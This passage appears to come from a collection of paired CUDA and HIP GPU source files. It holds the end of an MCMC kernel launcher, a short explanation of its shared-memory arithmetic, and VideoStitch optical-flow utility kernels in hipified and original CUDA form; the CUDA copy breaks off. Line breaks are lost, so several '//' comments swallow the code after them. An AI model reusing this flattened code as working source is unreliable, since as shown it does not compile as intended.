thrust::raw_pointer_cast(isosignals_gpu.data()); curandState *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); double *oldangtmp_ptr = thrust::raw_pointer_cast(oldangtmp_gpu.data()); double *oldsignals_ptr = thrust::raw_pointer_cast(oldsignals_gpu.data()); double *oldisosignals_ptr = thrust::raw_pointer_cast(oldisosignals_gpu.data()); float *rf0_ptr = thrust::raw_pointer_cast(rf0_gpu.data()); float *rtau_ptr = thrust::raw_pointer_cast(rtau_gpu.data()); float *rs0_ptr = thrust::raw_pointer_cast(rs0_gpu.data()); float *rd_ptr = thrust::raw_pointer_cast(rd_gpu.data()); float *rdstd_ptr = thrust::raw_pointer_cast(rdstd_gpu.data()); float *rR_ptr = thrust::raw_pointer_cast(rR_gpu.data()); float *rth_ptr = thrust::raw_pointer_cast(rth_gpu.data()); float *rph_ptr = thrust::raw_pointer_cast(rph_gpu.data()); float *rf_ptr = thrust::raw_pointer_cast(rf_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (10*nfib + 27)*sizeof(float) + (7*nfib + 20)*sizeof(int)+ sizeof(curandState)); myfile << "Shared Memory Used in runmcmc_record: " << amount_shared << "\n"; if(nvox!=0){ runmcmc_kernel<<< Dim_Grid, Dim_Block, amount_shared >>>(datam_ptr, bvals_ptr, alpha_ptr, beta_ptr, randStates_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.ardf0.value(), !opts.no_ard.value(), opts.rician.value(), gradnonlin, opts.updateproposalevery.value(), opts.njumps.value(), opts.nburn.value(), opts.sampleevery.value(), totalrecords, oldsignals_ptr, oldisosignals_ptr, angtmp_ptr, oldangtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr, rf0_ptr, rtau_ptr, rs0_ptr, rd_ptr, rdstd_ptr, rR_ptr, rth_ptr, rph_ptr, rf_ptr); sync_check("runmcmc_record_kernel"); } gettimeofday(&t_tot2,NULL); time=timeval_diff(&t_tot2,&t_tot1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n" ; myfile.close(); }
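Both the burn-in and the record kernels in this pair request dynamic shared memory as amount_shared = VOXELS_BLOCK_MCMC * (THREADS_VOXEL_MCMC doubles + (10*nfib + 27) floats + (7*nfib + 20) ints + one curandState). The snippet below works through that arithmetic under assumed constants; the real values of VOXELS_BLOCK_MCMC, THREADS_VOXEL_MCMC and sizeof(curandState) come from the kernels header and the CUDA toolkit, not from this file.

// Worked example of the amount_shared formula; every constant below is an assumption.
#include <cstdio>

int main() {
    const int VOXELS_BLOCK_MCMC  = 8;    // assumed
    const int THREADS_VOXEL_MCMC = 32;   // assumed
    const int nfib               = 3;    // assumed fibre count
    const int sizeof_curandState = 48;   // assumed; the real size comes from curand_kernel.h
    const int per_voxel = THREADS_VOXEL_MCMC * (int)sizeof(double)   // 256 bytes of scratch doubles
                        + (10 * nfib + 27) * (int)sizeof(float)      // 57 floats = 228 bytes
                        + (7 * nfib + 20) * (int)sizeof(int)         // 41 ints   = 164 bytes
                        + sizeof_curandState;                        //             48 bytes
    printf("amount_shared = %d bytes\n", VOXELS_BLOCK_MCMC * per_voxel);  // 8 * 696 = 5568 bytes
    return 0;
}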
63bfae59361b30a760c321ff1af98751cec90241.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" // Copyright (c) 2012-2017 VideoStitch SAS // Copyright (c) 2018 stitchEm #include "opticalFlowUtils.hpp" #include "backend/common/vectorOps.hpp" #include "backend/cuda/deviceBuffer.hpp" #include "backend/cuda/deviceStream.hpp" #include "gpu/image/sampling.hpp" #include "gpu/image/imageOps.hpp" #include "gpu/image/blur.hpp" #include "gpu/stream.hpp" #include "cuda/error.hpp" #include "cuda/util.hpp" #include "util/imageProcessingGPUUtils.hpp" #include "backend/cuda/core1/kernels/samplingKernel.cu" #include "parallax/gpu/cuda/kernels/patchDifferenceFunction.cu" #define REGULARIZATION_TILE_WIDTH 16 #define KERNEL_SIZE 25 #define AREA_SIZE (REGULARIZATION_TILE_WIDTH + 2 * KERNEL_SIZE) #define TILE_WIDTH 16 #define CUDABLOCKSIZE 512 namespace VideoStitch { namespace Util { __global__ void backwardCoordLookupKernel(const int2 inputOffset, int2 inputSize, const float2* g_iCoord, const int2 outputOffset, int2 outputSize, float2* g_oCoord) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < inputSize.x && y < inputSize.y) { const float2 iCoord = g_iCoord[y * inputSize.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { const float2 inputCoord = make_float2(inputOffset.x + x, inputOffset.y + y); const float2 outputCoord = inputCoord + iCoord; const float2 relativeOutputCoord = outputCoord - make_float2(outputOffset.x, outputOffset.y); if (inRange(relativeOutputCoord, outputSize)) { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = make_float2(0, 0) - iCoord; } } } } Status OpticalFlow::backwardCoordLookup(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputCoordBuffer, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputCoordBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); hipLaunchKernelGGL(( backwardCoordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, inputOffset, inputSize, inputCoordBuffer.get(), outputOffset, outputSize, outputCoordBuffer.get()); return CUDA_STATUS; } struct BilinearFlowInterpolation { typedef float2 Type; static inline __device__ float2 interpolate(float2 a, float2 b, float2 c, float2 d) { if (a.x == INVALID_FLOW_VALUE || b.x == INVALID_FLOW_VALUE || c.x == INVALID_FLOW_VALUE || d.x == INVALID_FLOW_VALUE) { return make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); } else { return (9.0f / 16.0f * a + 3.0f / 16.0f * (b + c) + 1.0f / 16.0f * d); } } }; Status OpticalFlow::upsampleFlow22(GPU::Buffer<float2> dst, GPU::Buffer<const float2> src, std::size_t dstWidth, std::size_t dstHeight, bool wrap, unsigned blockSize, GPU::Stream stream) { const unsigned srcWidth = ((unsigned)dstWidth + 1) / 2; const unsigned srcHeight = ((unsigned)dstHeight + 1) / 2; const dim3 dimBlock(blockSize, blockSize, 1); const dim3 dimGrid((unsigned)Cuda::ceilDiv(srcWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(srcHeight, dimBlock.y), 1); if (wrap) { hipLaunchKernelGGL(( Image::upsample22Kernel<Image::HWrapBoundary<float2>, BilinearFlowInterpolation>) , dim3(dimGrid), dim3(dimBlock), (blockSize + 2) * (blockSize + 2) * sizeof(float2), stream.get(), dst.get(), src.get(), (unsigned)dstWidth, (unsigned)dstHeight, srcWidth, srcHeight); } else { hipLaunchKernelGGL(( 
Image::upsample22Kernel<Image::ExtendBoundary<float2>, BilinearFlowInterpolation>) , dim3(dimGrid), dim3(dimBlock), (blockSize + 2) * (blockSize + 2) * sizeof(float2), stream.get(), dst.get(), src.get(), (unsigned)dstWidth, (unsigned)dstHeight, srcWidth, srcHeight); } return CUDA_STATUS; } __global__ void outwardCoordLookupKernel(const int2 offset1, int2 size1, const float2* g_iCoord, const int2 offset0, const int2 size0, const uint32_t* g_iBuffer, uint32_t* g_oBuffer) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size1.x && y < size1.y) { g_oBuffer[y * size1.x + x] = 0; const float2 iCoord = g_iCoord[y * size1.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { // const float2 outputCoord = make_float2(offset1.x - offset0.x + x + iCoord.x, offset1.y - offset0.y + y + // iCoord.y); if (inRange(outputCoord, size0)) { g_oBuffer[y * size1.x + x] = g_iBuffer[y * size0.x + x]; } } } } Status OpticalFlow::outwardCoordLookup(const int2 offset1, const int2 size1, const GPU::Buffer<const float2> coordBuffer, const int2 offset0, const int2 size0, const GPU::Buffer<const uint32_t> inputBuffer, GPU::Buffer<uint32_t> outputBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size1.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size1.y, dimBlock.y), 1); hipLaunchKernelGGL(( outwardCoordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, offset1, size1, coordBuffer.get(), offset0, size0, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void forwardCoordLookupKernel(const int2 inputOffset, int2 inputSize, const float2* g_iCoord, const int2 originalOffset, const int2 originalSize, const float2* g_originalCoord, const int2 outputOffset, int2 outputSize, float2* g_oCoord) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < inputSize.x && y < inputSize.y) { const float2 iCoord = g_iCoord[y * inputSize.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { const float2 inputCoord = make_float2(inputOffset.x + x, inputOffset.y + y); const float2 outputCoord = inputCoord + iCoord; const float2 relativeOutputCoord = outputCoord - make_float2(outputOffset.x, outputOffset.y); const float2 originalOutputcoord = outputCoord - make_float2(originalOffset.x, originalOffset.y); // Check the original flow value, in exist at all float2 originalFlow = make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); if (inRange(originalOutputcoord, originalSize)) { originalFlow = g_originalCoord[int(originalOutputcoord.y) * originalSize.x + int(originalOutputcoord.x)]; } if (inRange(relativeOutputCoord, outputSize)) { if (originalFlow.x == INVALID_FLOW_VALUE) { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = make_float2(0, 0) - iCoord; } else { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = originalFlow; } } } } } Status OpticalFlow::forwardCoordLookup(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputCoordBuffer, const int2 originalOffset, const int2 originalSize, const GPU::Buffer<const float2> originalCoordBuffer, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputCoordBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), 
(unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); hipLaunchKernelGGL(( forwardCoordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, inputOffset, inputSize, inputCoordBuffer.get(), originalOffset, originalSize, originalCoordBuffer.get(), outputOffset, outputSize, outputCoordBuffer.get()); return CUDA_STATUS; } __global__ void putOverOriginalFlowKernel(const int2 inputOffset, const int2 inputSize, const float2* const inputFlow, const int2 outputOffset, const int2 outputSize, float2* outputFlow) { uint32_t x = blockIdx.x * blockDim.x + threadIdx.x; uint32_t y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= inputSize.x || y >= inputSize.y) return; float2 input = inputFlow[y * inputSize.x + x]; if (input.x != INVALID_FLOW_VALUE) { int2 outputCoord = make_int2(x, y) + inputOffset - outputOffset; if (inRange(outputCoord, outputSize)) { outputFlow[outputCoord.y * outputSize.x + outputCoord.x] = input; } } } Status OpticalFlow::putOverOriginalFlow(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputFlow, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputFlow, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); hipLaunchKernelGGL(( putOverOriginalFlowKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, inputOffset, inputSize, inputFlow.get(), outputOffset, outputSize, outputFlow.get()); return CUDA_STATUS; } __global__ void identityFlowKernel(const bool normalizedFlow, const int2 size, float2* coordBuffer) { uint32_t x = blockIdx.x * blockDim.x + threadIdx.x; uint32_t y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size.x || y >= size.y) return; if (normalizedFlow) { coordBuffer[y * size.x + x] = make_float2(float(x) / size.x, float(y) / size.y); } else { coordBuffer[y * size.x + x] = make_float2(x, y); } } Status OpticalFlow::generateIdentityFlow(const int2 size, GPU::Buffer<float2> coordBuffer, GPU::Stream gpuStream, const bool normalizedFlow) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size.y, TILE_WIDTH), 1); hipLaunchKernelGGL(( identityFlowKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, normalizedFlow, size, coordBuffer.get()); return CUDA_STATUS; } __global__ void transformOffsetToFlowKernel(const int2 size0, const int2 offset0, const int2 offset1, const float2* const inputBuffer, float2* const outputBuffer) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size0.x || y >= size0.y) return; float2 offset = inputBuffer[y * size0.x + x]; if (offset.x != INVALID_FLOW_VALUE) { outputBuffer[y * size0.x + x] = offset + make_float2(x + offset0.x - offset1.x, y + offset0.y - offset1.y); } else { outputBuffer[y * size0.x + x] = offset; } } Status OpticalFlow::transformOffsetToFlow(const int2 size0, const int2 offset0, const int2 offset1, GPU::Buffer<float2> buffer, GPU::Stream gpuStream) { return transformOffsetToFlow(size0, offset0, offset1, buffer, buffer, gpuStream); } Status OpticalFlow::transformOffsetToFlow(const int2 size0, const int2 offset0, const int2 offset1, const GPU::Buffer<const float2> inputBuffer, GPU::Buffer<float2> outputBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 
dimGrid((unsigned)Cuda::ceilDiv(size0.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size0.y, TILE_WIDTH), 1); hipLaunchKernelGGL(( transformOffsetToFlowKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, size0, offset0, offset1, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void transformFlowToOffsetKernel(const int2 size0, const int2 offset0, const int2 offset1, const float2* const inputBuffer, float2* const outputBuffer) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size0.x || y >= size0.y) return; float2 flow = inputBuffer[y * size0.x + x]; if (flow.x != INVALID_FLOW_VALUE) outputBuffer[y * size0.x + x] = flow - make_float2(x + offset0.x - offset1.x, y + offset0.y - offset1.y); else outputBuffer[y * size0.x + x] = flow; } Status OpticalFlow::transformFlowToOffset(const int2 size0, const int2 offset0, const int2 offset1, const GPU::Buffer<const float2> inputBuffer, GPU::Buffer<float2> outputBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size0.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size0.y, TILE_WIDTH), 1); hipLaunchKernelGGL(( transformFlowToOffsetKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, size0, offset0, offset1, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void coordLookupKernel(int outputWidth, int outputHeight, const float2* g_iCoord, int inputWidth, int inputHeight, const uint32_t* g_idata, uint32_t* g_odata) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < outputWidth && y < outputHeight) { float2 uv = g_iCoord[y * outputWidth + x]; int2 size = make_int2(inputWidth, inputHeight); g_odata[y * outputWidth + x] = Image::bilinearLookup<Image::BilinearLookupRGBAtoRGBA>(uv, size, g_idata); } } Status OpticalFlow::coordLookup(const int outputWidth, const int outputHeight, const GPU::Buffer<const float2> coordBuffer, const int inputWidth, const int inputHeight, const GPU::Buffer<const uint32_t> inputBuffer, GPU::Buffer<uint32_t> outputBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(outputWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(outputHeight, dimBlock.y), 1); hipLaunchKernelGGL(( coordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, outputWidth, outputHeight, coordBuffer.get(), inputWidth, inputHeight, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void mulFlowOperatorKernel(float2* dst, const float2 toMul, std::size_t size) { std::size_t i = (blockIdx.x + blockIdx.y * gridDim.x) * blockDim.x + threadIdx.x; if (i < size) { if (dst[i].x != INVALID_FLOW_VALUE) { dst[i] *= toMul; } } } Status OpticalFlow::mulFlowOperator(GPU::Buffer<float2> dst, const float2 toMul, std::size_t size, GPU::Stream stream) { dim3 dimBlock(CUDABLOCKSIZE); dim3 dimGrid(Cuda::compute2DGridForFlatBuffer(size, CUDABLOCKSIZE)); hipLaunchKernelGGL(( mulFlowOperatorKernel), dim3(dimGrid), dim3(dimBlock), 0, stream.get(), dst.get(), toMul, size); return CUDA_STATUS; } __global__ void mulFlowOperatorKernel(float2* dst, const float2* src, const float2 toMul, std::size_t size) { std::size_t i = (blockIdx.x + blockIdx.y * gridDim.x) * blockDim.x + threadIdx.x; if (i < size) { if (dst[i].x != INVALID_FLOW_VALUE) { dst[i] = make_float2(src[i].x * toMul.x, src[i].y * 
toMul.y); } } } Status OpticalFlow::mulFlowOperator(GPU::Buffer<float2> dst, const GPU::Buffer<const float2> src, const float2 toMul, std::size_t size, GPU::Stream stream) { dim3 dimBlock(CUDABLOCKSIZE); dim3 dimGrid(Cuda::compute2DGridForFlatBuffer(size, CUDABLOCKSIZE)); hipLaunchKernelGGL(( mulFlowOperatorKernel), dim3(dimGrid), dim3(dimBlock), 0, stream.get(), dst.get(), src.get(), toMul, size); return CUDA_STATUS; } __global__ void generateWeightKernel(const int kernelSize, const float sigmaDistance, float* kernelWeight) { int y = blockIdx.y * blockDim.x + threadIdx.y; int x = blockIdx.x * blockDim.y + threadIdx.x; if (x <= 2 * kernelSize && y <= 2 * kernelSize) { float maxDist = kernelSize * 1.4142; float distSpace = length(make_float2(x - kernelSize, y - kernelSize)) / maxDist; float weightDist = exp(-sigmaDistance * distSpace * distSpace); kernelWeight[y * (2 * kernelSize + 1) + x] = weightDist; } } __global__ void interCoordLookupKernel(const int warpWidth, const int interOffsetX, const int interOffsetY, const int interWidth, const int interHeight, const uint32_t* inputBuffer, const int coordWidth, const int coordHeight, const float2* coordBuffer, uint32_t* outputBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < coordWidth && y < coordHeight) { float2 coord = coordBuffer[y * coordWidth + x] - make_float2(interOffsetX, interOffsetY); if (coord.x >= 0 && coord.x < interWidth && coord.y >= 0 && coord.y < interHeight) { outputBuffer[y * coordWidth + x] = inputBuffer[int(coord.y) * interWidth + int(coord.x)]; } else { outputBuffer[y * coordWidth + x] = 0; } } } Status OpticalFlow::interCoordLookup(const int warpWidth, const int interOffsetX, const int interOffsetY, const int interWidth, const int interHeight, const GPU::Buffer<const uint32_t> inputBuffer, const int coordWidth, const int coordHeight, const GPU::Buffer<const float2> coordBuffer, GPU::Buffer<uint32_t> output, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(coordWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(coordHeight, dimBlock.y), 1); hipLaunchKernelGGL(( interCoordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, warpWidth, interOffsetX, interOffsetY, interWidth, interHeight, inputBuffer.get(), coordWidth, coordHeight, coordBuffer.get(), output.get()); return CUDA_STATUS; } __global__ void flowToRGBAKernel(const int2 size, const float2* inputBuffer, const int2 maxFlowValue, uint32_t* outputBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size.x && y < size.y) { float2 input = inputBuffer[y * size.x + x]; if (abs(input.x - INVALID_FLOW_VALUE) < 1e-5) { outputBuffer[y * size.x + x] = 0; } else { outputBuffer[y * size.x + x] = Image::RGBA::pack((float(input.x) / maxFlowValue.x) * 255, (float(input.y) / maxFlowValue.y) * 255, 0, 255); } } } Status OpticalFlow::convertFlowToRGBA(const int2 size, const GPU::Buffer<const float2> src, const int2 maxFlowValue, GPU::Buffer<uint32_t> dst, GPU::Stream stream) { dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); const dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size.y, dimBlock.y), 1); hipLaunchKernelGGL(( flowToRGBAKernel), dim3(dimGrid), dim3(dimBlock), 0, stream.get(), size, src.get(), maxFlowValue, dst.get()); return 
CUDA_STATUS; } __global__ void setAlphaToFlowBufferKernel(const int2 size, const uint32_t* colorBuffer, float2* flowBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size.x && y < size.y) { const unsigned index = y * size.x + x; if (Image::RGBA::a(colorBuffer[index]) == 0) { flowBuffer[index] = make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); } } } Status OpticalFlow::setAlphaToFlowBuffer(const int2 size, const GPU::Buffer<const uint32_t> colorBuffer, GPU::Buffer<float2> flowBuffer, GPU::Stream gpuStream) { dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size.y, dimBlock.y), 1); hipStream_t stream = gpuStream.get(); hipLaunchKernelGGL(( setAlphaToFlowBufferKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, size, colorBuffer.get(), flowBuffer.get()); return CUDA_STATUS; } } // namespace Util } // namespace VideoStitch
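In the file above, transformOffsetToFlowKernel and transformFlowToOffsetKernel are exact inverses: an offset stores only the per-pixel displacement, while the corresponding flow adds (x + offset0.x - offset1.x, y + offset0.y - offset1.y) so the value is expressed relative to the second buffer's origin. The small CPU-side sketch below illustrates that arithmetic; all the numbers are made up for the example.

// CPU illustration of the offset <-> flow relation used by the two kernels above.
#include <cstdio>

struct f2 { float x, y; };

int main() {
    const f2 offset0 = {100.f, 40.f};   // assumed origin of buffer 0
    const f2 offset1 = {260.f, 40.f};   // assumed origin of buffer 1
    const int x = 10, y = 5;            // pixel inside buffer 0
    const f2 offset = {3.f, -2.f};      // stored per-pixel displacement

    // transformOffsetToFlowKernel: flow = offset + (x + offset0 - offset1, y + offset0 - offset1)
    const f2 flow = { offset.x + (x + offset0.x - offset1.x),
                      offset.y + (y + offset0.y - offset1.y) };

    // transformFlowToOffsetKernel subtracts the same term, recovering the original offset.
    const f2 back = { flow.x - (x + offset0.x - offset1.x),
                      flow.y - (y + offset0.y - offset1.y) };

    printf("flow = (%g, %g), offset recovered = (%g, %g)\n", flow.x, flow.y, back.x, back.y);
    return 0;
}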
63bfae59361b30a760c321ff1af98751cec90241.cu
// Copyright (c) 2012-2017 VideoStitch SAS // Copyright (c) 2018 stitchEm #include "opticalFlowUtils.hpp" #include "backend/common/vectorOps.hpp" #include "backend/cuda/deviceBuffer.hpp" #include "backend/cuda/deviceStream.hpp" #include "gpu/image/sampling.hpp" #include "gpu/image/imageOps.hpp" #include "gpu/image/blur.hpp" #include "gpu/stream.hpp" #include "cuda/error.hpp" #include "cuda/util.hpp" #include "util/imageProcessingGPUUtils.hpp" #include "backend/cuda/core1/kernels/samplingKernel.cu" #include "parallax/gpu/cuda/kernels/patchDifferenceFunction.cu" #define REGULARIZATION_TILE_WIDTH 16 #define KERNEL_SIZE 25 #define AREA_SIZE (REGULARIZATION_TILE_WIDTH + 2 * KERNEL_SIZE) #define TILE_WIDTH 16 #define CUDABLOCKSIZE 512 namespace VideoStitch { namespace Util { __global__ void backwardCoordLookupKernel(const int2 inputOffset, int2 inputSize, const float2* g_iCoord, const int2 outputOffset, int2 outputSize, float2* g_oCoord) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < inputSize.x && y < inputSize.y) { const float2 iCoord = g_iCoord[y * inputSize.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { const float2 inputCoord = make_float2(inputOffset.x + x, inputOffset.y + y); const float2 outputCoord = inputCoord + iCoord; const float2 relativeOutputCoord = outputCoord - make_float2(outputOffset.x, outputOffset.y); if (inRange(relativeOutputCoord, outputSize)) { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = make_float2(0, 0) - iCoord; } } } } Status OpticalFlow::backwardCoordLookup(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputCoordBuffer, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputCoordBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); backwardCoordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(inputOffset, inputSize, inputCoordBuffer.get(), outputOffset, outputSize, outputCoordBuffer.get()); return CUDA_STATUS; } struct BilinearFlowInterpolation { typedef float2 Type; static inline __device__ float2 interpolate(float2 a, float2 b, float2 c, float2 d) { if (a.x == INVALID_FLOW_VALUE || b.x == INVALID_FLOW_VALUE || c.x == INVALID_FLOW_VALUE || d.x == INVALID_FLOW_VALUE) { return make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); } else { return (9.0f / 16.0f * a + 3.0f / 16.0f * (b + c) + 1.0f / 16.0f * d); } } }; Status OpticalFlow::upsampleFlow22(GPU::Buffer<float2> dst, GPU::Buffer<const float2> src, std::size_t dstWidth, std::size_t dstHeight, bool wrap, unsigned blockSize, GPU::Stream stream) { const unsigned srcWidth = ((unsigned)dstWidth + 1) / 2; const unsigned srcHeight = ((unsigned)dstHeight + 1) / 2; const dim3 dimBlock(blockSize, blockSize, 1); const dim3 dimGrid((unsigned)Cuda::ceilDiv(srcWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(srcHeight, dimBlock.y), 1); if (wrap) { Image::upsample22Kernel<Image::HWrapBoundary<float2>, BilinearFlowInterpolation> <<<dimGrid, dimBlock, (blockSize + 2) * (blockSize + 2) * sizeof(float2), stream.get()>>>( dst.get(), src.get(), (unsigned)dstWidth, (unsigned)dstHeight, srcWidth, srcHeight); } else { Image::upsample22Kernel<Image::ExtendBoundary<float2>, BilinearFlowInterpolation> <<<dimGrid, dimBlock, (blockSize + 2) * (blockSize + 2) * sizeof(float2), stream.get()>>>( dst.get(), 
src.get(), (unsigned)dstWidth, (unsigned)dstHeight, srcWidth, srcHeight); } return CUDA_STATUS; } __global__ void outwardCoordLookupKernel(const int2 offset1, int2 size1, const float2* g_iCoord, const int2 offset0, const int2 size0, const uint32_t* g_iBuffer, uint32_t* g_oBuffer) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size1.x && y < size1.y) { g_oBuffer[y * size1.x + x] = 0; const float2 iCoord = g_iCoord[y * size1.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { // const float2 outputCoord = make_float2(offset1.x - offset0.x + x + iCoord.x, offset1.y - offset0.y + y + // iCoord.y); if (inRange(outputCoord, size0)) { g_oBuffer[y * size1.x + x] = g_iBuffer[y * size0.x + x]; } } } } Status OpticalFlow::outwardCoordLookup(const int2 offset1, const int2 size1, const GPU::Buffer<const float2> coordBuffer, const int2 offset0, const int2 size0, const GPU::Buffer<const uint32_t> inputBuffer, GPU::Buffer<uint32_t> outputBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size1.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size1.y, dimBlock.y), 1); outwardCoordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(offset1, size1, coordBuffer.get(), offset0, size0, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void forwardCoordLookupKernel(const int2 inputOffset, int2 inputSize, const float2* g_iCoord, const int2 originalOffset, const int2 originalSize, const float2* g_originalCoord, const int2 outputOffset, int2 outputSize, float2* g_oCoord) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < inputSize.x && y < inputSize.y) { const float2 iCoord = g_iCoord[y * inputSize.x + x]; if (iCoord.x != 